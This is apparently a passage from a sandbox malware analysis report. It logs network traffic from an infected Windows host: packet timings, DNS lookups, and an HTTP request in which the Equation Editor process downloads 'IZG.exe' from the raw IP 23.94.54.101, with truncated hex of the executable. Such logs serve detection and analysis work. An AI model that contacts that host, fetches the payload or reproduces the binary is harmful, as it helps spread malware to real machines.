                                                                    May 2, 2024 04:59:50.009618044 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.021604061 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.021610022 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.021632910 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.021663904 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.021681070 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.021688938 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.021696091 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.021716118 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.021723986 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.021749973 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.021770000 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.022408962 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.022819042 CEST49164443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.022829056 CEST44349164172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.697963953 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.698004007 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.698076963 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.704452991 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.704472065 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.811028957 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.811064959 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.811129093 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.812444925 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.812458992 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.897728920 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.897763968 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.897983074 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.911315918 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.911336899 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.940943003 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.961393118 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.961431026 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.961482048 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.963440895 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.963454008 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.963619947 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.963632107 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.964951992 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.965022087 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.970653057 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.970731020 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:50.970906973 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:50.970913887 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.040369034 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.091835022 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.091871023 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.092952967 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.093023062 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.113409042 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.113512993 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.118195057 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.118213892 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.140897989 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.147558928 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.147568941 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.149044991 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.149117947 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.176120043 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.176222086 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.183875084 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.184003115 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.184052944 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.193147898 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.193928003 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.194540977 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.194595098 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.224118948 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.305769920 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.305814981 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.307123899 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.307142019 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.307188988 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.314488888 CEST49168443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.314517975 CEST44349168172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.320547104 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.320628881 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.320698977 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.320714951 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.332118988 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.332174063 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.388123035 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.388184071 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.540121078 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.540182114 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.614763021 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.614880085 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.614881039 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.614916086 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.623307943 CEST49169443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.623337030 CEST44349169172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.627840996 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.627883911 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.627928972 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.628304005 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.628325939 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.649424076 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.649512053 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.649542093 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.649609089 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.649663925 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.656564951 CEST49170443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.656589031 CEST44349170172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.667517900 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.667552948 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.667614937 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.667836905 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.667851925 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.782639027 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.782706022 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.782727957 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.782782078 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.782819986 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.783549070 CEST49171443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.783566952 CEST44349171172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.784476995 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.784513950 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.784562111 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.784810066 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.784822941 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.864357948 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.864639044 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.864659071 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.864948988 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.865376949 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.865433931 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.865535975 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.897337914 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.898384094 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.898407936 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.898756981 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.900075912 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.900150061 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.900280952 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:51.908119917 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:51.944116116 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.013046980 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.017291069 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.017333031 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.017401934 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.026449919 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.026474953 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.026890993 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.026921988 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.027501106 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.027566910 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.033283949 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.033359051 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.033505917 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.033515930 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.100049019 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.100089073 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.100123882 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.100145102 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.100219965 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.100255966 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.103131056 CEST49172443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.103147030 CEST44349172172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.129611015 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.129651070 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.129689932 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.129712105 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.129738092 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.129754066 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.129772902 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.129807949 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.145447969 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.145479918 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.145526886 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.212843895 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.212858915 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.216456890 CEST49173443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.216492891 CEST44349173172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.244118929 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.244187117 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.245626926 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.245706081 CEST44349174172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.245760918 CEST49174443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.246733904 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.246769905 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.246814966 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.249026060 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.249037981 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.254282951 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.258013964 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.258038044 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.258322954 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.258981943 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.259028912 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.259279966 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.304116964 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.447061062 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.448285103 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.448292017 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.449131966 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.449179888 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.450447083 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.450484037 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.451031923 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.451035976 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.477972984 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.478605032 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.478626013 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.478914022 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.486345053 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.486408949 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.486888885 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.510191917 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.510227919 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.510297060 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.510320902 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.513345957 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.513386011 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.513391972 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.514183998 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.514224052 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.532108068 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.599395037 CEST49175443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:52.599423885 CEST44349175172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.660116911 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:52.660196066 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.194005966 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.194123030 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.195307016 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.196683884 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.196840048 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.196912050 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.211838007 CEST49176443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.211853981 CEST44349176172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.212193966 CEST49177443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.212213993 CEST44349177172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.213213921 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.213258982 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.213308096 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.213978052 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.213993073 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.214605093 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.214643002 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.214725018 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.215142965 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.215172052 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.443661928 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.444418907 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.444437981 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.444788933 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.444926977 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.445286989 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.445352077 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.445472002 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.445496082 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.445755959 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.445825100 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.446217060 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.446281910 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.446430922 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.488120079 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.492114067 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.675393105 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.675431967 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.675472975 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.675515890 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.675528049 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.675571918 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.676451921 CEST49179443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.676465988 CEST44349179172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.677508116 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.677546978 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.677573919 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.677613020 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.677638054 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.677989006 CEST49180443192.168.2.22172.217.1.4
                                                                    May 2, 2024 04:59:53.678023100 CEST44349180172.217.1.4192.168.2.22
                                                                    May 2, 2024 04:59:53.678071976 CEST49180443192.168.2.22172.217.1.4

                                                                    UDP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    May 2, 2024 04:59:47.543797970 CEST5291753192.168.2.228.8.8.8
                                                                    May 2, 2024 04:59:47.545480967 CEST6275153192.168.2.228.8.8.8
                                                                    May 2, 2024 04:59:47.636168957 CEST53627518.8.8.8192.168.2.22
                                                                    May 2, 2024 04:59:47.640117884 CEST53529178.8.8.8192.168.2.22
                                                                    May 2, 2024 04:59:47.643583059 CEST53548218.8.8.8192.168.2.22
                                                                    May 2, 2024 04:59:47.802365065 CEST53498818.8.8.8192.168.2.22
                                                                    May 2, 2024 04:59:50.454046011 CEST6551053192.168.2.228.8.8.8
                                                                    May 2, 2024 04:59:50.493869066 CEST6267253192.168.2.228.8.8.8
                                                                    May 2, 2024 04:59:50.550714016 CEST53655108.8.8.8192.168.2.22
                                                                    May 2, 2024 04:59:50.586508989 CEST53626728.8.8.8192.168.2.22
                                                                    May 2, 2024 04:59:50.856822968 CEST53493848.8.8.8192.168.2.22
                                                                    May 2, 2024 05:00:07.904285908 CEST53505688.8.8.8192.168.2.22
                                                                    May 2, 2024 05:00:15.793735981 CEST53563298.8.8.8192.168.2.22
                                                                    May 2, 2024 05:00:26.391371012 CEST53518708.8.8.8192.168.2.22

                                                                    DNS Queries

                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    May 2, 2024 04:59:47.543797970 CEST192.168.2.228.8.8.80x44dfStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:47.545480967 CEST192.168.2.228.8.8.80xe54fStandard query (0)www.google.com65IN (0x0001)false
                                                                    May 2, 2024 04:59:50.454046011 CEST192.168.2.228.8.8.80x249aStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:50.493869066 CEST192.168.2.228.8.8.80x350aStandard query (0)www.google.com65IN (0x0001)false

                                                                    DNS Answers

                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    May 2, 2024 04:59:47.636168957 CEST8.8.8.8192.168.2.220xe54fNo error (0)www.google.com65IN (0x0001)false
                                                                    May 2, 2024 04:59:47.640117884 CEST8.8.8.8192.168.2.220x44dfNo error (0)www.google.com172.217.1.4A (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:50.550714016 CEST8.8.8.8192.168.2.220x249aNo error (0)www.google.com172.217.1.4A (IP address)IN (0x0001)false
                                                                    May 2, 2024 04:59:50.586508989 CEST8.8.8.8192.168.2.220x350aNo error (0)www.google.com65IN (0x0001)false

                                                                    HTTP Request Dependency Graph

                                                                    • www.google.com
                                                                    • 23.94.54.101

                                                                    HTTP Packets

                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.224916323.94.54.101802060C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    May 2, 2024 04:59:07.767561913 CEST69OUTGET /IZG.exe HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Host: 23.94.54.101
                                                                    May 2, 2024 04:59:07.877931118 CEST1289INHTTP/1.1 200 OK
                                                                    Content-Type: application/octet-stream
                                                                    Last-Modified: Wed, 01 May 2024 18:27:08 GMT
                                                                    Accept-Ranges: bytes
                                                                    ETag: "56802d2df59bda1:0"
                                                                    Server: Microsoft-IIS/8.5
                                                                    Date: Thu, 02 May 2024 02:59:07 GMT
                                                                    Content-Length: 1287680
                                                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 cb fc 31 66 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 f6 09 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                    Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPEL1f"w@*@@@d|@:u4@.text `.rdata@@.datalpH@.rsrc:@<@@.relocuv0@B [TRUNCATED]
                                                                    May 2, 2024 04:59:07.878010035 CEST1289INData Raw: 68 f3 23 44 00 e8 83 f0 01 00 59 c3 e8 e6 de 01 00 68 f8 23 44 00 e8 72 f0 01 00 59 c3 e8 59 3c 00 00 68 fd 23 44 00 e8 61 f0 01 00 59 c3 51 e8 a9 00 00 00 68 02 24 44 00 e8 4f f0 01 00 59 c3 a1 30 14 4d 00 51 8b 40 04 05 30 14 4d 00 50 e8 e3 23
